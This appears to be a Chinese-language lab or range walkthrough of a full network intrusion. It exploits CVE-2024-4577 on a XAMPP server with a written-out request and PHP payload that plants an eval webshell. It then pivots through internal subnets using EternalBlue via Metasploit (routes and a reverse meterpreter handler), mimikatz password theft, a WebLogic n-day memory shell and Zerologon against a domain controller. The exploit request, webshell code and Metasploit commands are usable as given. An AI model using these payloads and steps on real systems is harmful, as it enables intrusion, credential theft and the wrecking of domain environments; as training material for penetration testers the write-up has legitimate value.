访问http://目标IP/dashboard/发现时是XAMPP搭建的web环境,利用最近刚爆出的**PHP远程代码执行(CVE-2024-4577)**漏洞进行攻击
POC-EXP
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
<?php die("Te"."sT");?>
<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>
通过BP或者postman等工具构造数据包验证是否存在
使用exp上传木马,这里要注意文件上传的位置
*XAMPP的常用路径*
网站根目录的默认路径:xampp\htdocs
执行chdir命令发现当前位于 C:\xampp\php
所以文件上传位置应该为 …\htdocs\xj.php
<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>
访问
木马成功写入,使用webshell工具连接
这里为了后续操作,直接上传远控木马进行上线操作
由于是第三方中间件搭建的web环境,拿到一个高权限,暂时不用考虑提权
做个信息收集:
可以看到还有一个内网地址192.168.2.0网段,直接进行扫描,看看存活哪些主机
当前拿下的主机内网ip为192.168.2.140
扫到一台主机192.168.2.128
信息收集发现开放了 445 永恒之蓝ms17010漏洞利用端口
验证是否存在ms17010漏洞
CS设置
msf设置
添加路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
利用
use exploit/windows/smb/ms17_010_eternalblue
由于需要192.168.2.140作为反连接受shell主机,因为攻击目标处于内网,不能直接与我们攻击服务器进行通讯需要在192.168.2.140进行以下操作(设置一个接收shell)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost 192.168.2.140
set lport 4444
exploit -j
成功拿下对应主机,为了后续方便,这里依旧将权限移交给CS
同样对端口和内网段存活主机进行一个探测
出现新目标
由于是win7系统,可以尝试抓明文密码,这里mimikatz抓取到了密码,尝试横向移动192.168.2.129
这里需要注意一个木马的正反向,如果是用反向,应该以192.168.2.140为反连IP,如果想要利用192,168.2.128攻击,只能使用正向bind木马攻击,因为192.168.2.128开启了防火墙,而192.168.2.129并未设置防火墙
成功拿下192.168.2.129主机
同样操作,进行信息收集,探测
出现192.168.3.0新网卡,进行端口,IP扫描存活主机
3.128是刚刚拿下的主机,所以3.133则是下一个目标
可以看到,192.168.3.133开放了7001端口,这个端口一般就是weblogic的默认端口,但由于搭建在内网,我们无法直接访问,但刚刚拿下的192.168.3.128这台主机是能够进行通讯的,我们将其作为跳板机,建立代理进行攻击
成功本地访问到目标内网服务,由于是weblogic,尝试一个Nday利用
存在
执行命令没问题
为了后续利用,还是想办法让他上线到远控工具,这里有web服务,进行文件上传较为简单,但需要知道一个网站目录,但我们已经可以执行命令,所以还是可以找到的
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
这里不清楚为什么不能,可能目录还是不对,所以换了一个方法,直接植入内存马
成功
传马上线,由于192.168.3.133有防火墙,采用反向到192.168.3.128
成功上线
新发现192.168.10.0
mimikatz抓取到了一个明文密码,再次尝试横向移动
由于weblogic存在防火墙,使用正向攻击192.168.10.12 横向移动
探测,net group “domain controllers” /domain 发现该主机处于域内环境,定位域控,
mimikatz抓取明文密码未成功,高版本禁止了,尝试域控提权,ms14068,CVE-2021-42287,CVE-2022-26923均不行,只有CVE-2020-1472可以利用,但该漏洞会将域内环境直接破坏(由于第一次操作时重置了域控密码,导致域内环境被破坏,无法进行复现),实操尽量多注意,至此,全部拿下